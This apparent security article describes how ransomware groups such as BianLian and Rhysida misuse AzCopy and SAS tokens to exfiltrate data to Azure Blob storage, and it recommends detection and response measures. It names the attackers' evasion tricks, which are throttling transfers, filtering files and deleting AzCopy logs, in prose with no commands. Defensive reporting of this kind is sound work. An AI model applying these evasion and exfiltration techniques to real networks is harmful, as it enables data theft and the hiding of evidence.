Introduction
Ransomware operators are increasingly abusing Microsoft’s trusted Azure data transfer utility, AzCopy, to quietly exfiltrate sensitive data before encryption. This shift turns a routine cloud migration tool into a stealthy theft channel, making it difficult for traditional detection methods to identify the malicious activity.
AzCopy: A Trusted Utility Turned Malicious
AzCopy is a command-line utility designed to move large volumes of data to and from Azure Storage. It is commonly used by enterprises for backup, migration, and large-scale data operations. Due to its widespread trust and minimal monitoring, AzCopy has become an attractive tool for ransomware groups to use for data exfiltration.
Ransomware Groups Leveraging AzCopy
Threat actors are using AzCopy and Azure Storage Explorer to bulk-upload stolen files from breached networks into attacker-controlled Azure Blob storage. This technique allows ransomware groups like BianLian and Rhysida to treat Microsoft’s cloud as their exfiltration staging ground.
How Attackers Exploit AzCopy
Attackers typically obtain valid Azure credentials or storage keys and generate Shared Access Signature (SAS) tokens to access storage accounts without interactive logins. A SAS URL embeds all required permissions, time windows, and target containers, allowing a single AzCopy command to stream large datasets straight into an external blob container.
Techniques to Avoid Detection
- Using the –cap-mbps flag to intentionally throttle transfer throughput, keeping traffic volumes stable and less suspicious on monitoring dashboards.
- Restricting which files are copied using include/exclude patterns and time-based filters, focusing on recent, high-value documents while minimizing noise.
These techniques make it difficult for security tools to detect the exfiltration activity, as the destination is a fully legitimate cloud provider and the channel is standard HTTPS to domains like *.blob.core.windows.net, which are often broadly allowed through firewalls and proxies.
Challenges in Detection and Response
In some real-world incidents, AzCopy-driven exfiltration went completely undetected by endpoint security tools, leaving it to specialized data security platforms and forensic analysis to reconstruct what was stolen. Even when Azure logging is enabled, threat actors may attempt to cover their tracks by deleting the local %USERPROFILE%\.azcopy logging directory after completing transfers.
Strategies to Mitigate AzCopy-Driven Exfiltration
Security teams must adopt a data-centric security strategy to map where sensitive data lives, who can access it, and what normal access and movement patterns look like. This approach ensures that deviations, such as a reporting account suddenly reading hundreds of thousands of files, generate high-fidelity alerts.
Implementing Effective Monitoring and Control
- Using User and Entity Behavior Analytics (UEBA) to flag abnormal file access and AzCopy usage by service or privileged accounts.
- Restricting direct internet access from servers to only known update and security endpoints.
- Scrutinizing connections to Azure Blob endpoints from systems that normally do not interact with cloud storage.
- Implementing application control policies to tightly scope where AzCopy is allowed to run and under which accounts.
Incident Response Planning
Incident response plans should explicitly address cloud-based exfiltration scenarios, including how to quickly revoke SAS tokens, rotate keys, isolate affected systems, and coordinate takedown or abuse reports with cloud providers.
Conclusion
As attackers increasingly weaponize legitimate cloud tools like AzCopy, organizations must monitor their own trusted utilities to prevent sensitive data from being delivered into ransomware operators’ hands.